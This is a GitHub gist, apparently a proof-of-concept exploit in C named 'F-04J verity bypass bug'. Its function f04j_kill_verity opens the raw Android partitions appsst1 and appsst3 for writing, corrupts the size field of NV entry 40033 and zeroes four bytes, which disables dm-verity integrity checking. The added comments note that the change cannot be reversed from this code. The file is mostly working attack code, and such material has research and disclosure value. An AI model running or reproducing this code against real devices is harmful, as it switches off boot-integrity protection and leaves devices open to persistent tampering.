@tewilove
Last active March 6, 2024 11:39
F-04J verity bypass bug
#include <sys/types.h>
#include <fcntl.h>
#include <inttypes.h>
#include <unistd.h>
#include "f-04j.h"
/* Byte offset within the partition at which the nv_entry record below is
 * read back and rewritten (see corrupt_nv_40033). */
#define OFFSET_ENTRY 0xA0
/* Byte offset within the partition at which a single zeroed uint32_t is
 * written. Whether this corresponds to the payload that nv_entry.offset
 * points at cannot be determined from this file — TODO confirm. */
#define OFFSET_DATA 0x3620

/* On-disk entry header as read from the partition at OFFSET_ENTRY.
 * Only `id` (compared against 40033) and `size` (overwritten) are used by
 * the code in this file; `flags` and `offset` are carried through unchanged.
 * NOTE(review): 16 bytes, little-endian assumed — the struct is read and
 * written with raw read()/write(), so host layout must match the device. */
struct nv_entry {
	uint32_t id;
	uint32_t flags;
	uint32_t offset;
	uint32_t size;
};
/*
 * Overwrite the NV entry with id 40033 on the given raw partition so that
 * its recorded size no longer matches, and zero the 4 bytes at OFFSET_DATA.
 *
 * The partition is opened O_RDWR, so the caller needs write access to the
 * block-device node itself; on a stock Android layout that is root, and a
 * raw write to these partitions is the event a defender would watch for.
 *
 * @param device  path of the block device (or image) to modify.
 * @return 0 on success, -1 on any open/seek/read/write failure or when the
 *         entry at OFFSET_ENTRY does not carry id 40033. errno is not
 *         preserved across the close() on the failure paths.
 *
 * Note: the original `size` value is not saved anywhere, so this change is
 * not reversible from this code alone.
 */
static int corrupt_nv_40033(const char *device)
{
	int rc;
	int fd;
	uint64_t offset;
	struct nv_entry e;
	uint32_t d;

	fd = open(device, O_RDWR);
	if (fd < 0)
		return -1;
	/* lseek returns (off_t)-1 on error; comparing the uint64_t copy against
	 * the expected offset also catches that case. */
	offset = lseek(fd, OFFSET_ENTRY, SEEK_SET);
	if (offset != OFFSET_ENTRY) {
		close(fd);
		return -1;
	}
	/* rc is int and sizeof(e) is size_t: a -1 return converts to a large
	 * unsigned value, so both an error and a short read fail this check. */
	rc = read(fd, &e, sizeof(e));
	if (rc != sizeof(e)) {
		close(fd);
		return -1;
	}
	/* Refuse to touch a partition whose entry at this offset is not 40033. */
	if (e.id != 40033) {
		close(fd);
		return -1;
	}
	/* Make size mismatch! — the other three fields are written back as read. */
	e.size = 3;
	offset = lseek(fd, OFFSET_ENTRY, SEEK_SET);
	if (offset != OFFSET_ENTRY) {
		close(fd);
		return -1;
	}
	rc = write(fd, &e, sizeof(e));
	if (rc != sizeof(e)) {
		close(fd);
		return -1;
	}
	/* Second modification: a single zeroed uint32_t at OFFSET_DATA. */
	d = 0;
	offset = lseek(fd, OFFSET_DATA, SEEK_SET);
	if (offset != OFFSET_DATA) {
		close(fd);
		return -1;
	}
	rc = write(fd, &d, sizeof(d));
	if (rc != sizeof(d)) {
		close(fd);
		return -1;
	}
	/* NOTE(review): the close() return value is not checked. */
	close(fd);
	return 0;
}
/*
 * Apply corrupt_nv_40033() to both of the named partitions.
 *
 * The two calls are not short-circuited: the second partition is modified
 * even if the first call failed. Because each call returns 0 or -1, the
 * OR-accumulated result is 0 only when both succeeded and -1 otherwise;
 * the caller cannot tell from the return value which partition failed.
 * The paths are Android "by-name" block-device symlinks, so write access
 * to the raw device nodes is required.
 *
 * @return 0 if both partitions were modified, -1 if either call failed.
 */
int f04j_kill_verity(void)
{
	int rc = 0;
	rc |= corrupt_nv_40033("/dev/block/bootdevice/by-name/appsst1");
	rc |= corrupt_nv_40033("/dev/block/bootdevice/by-name/appsst3");
	return rc;
}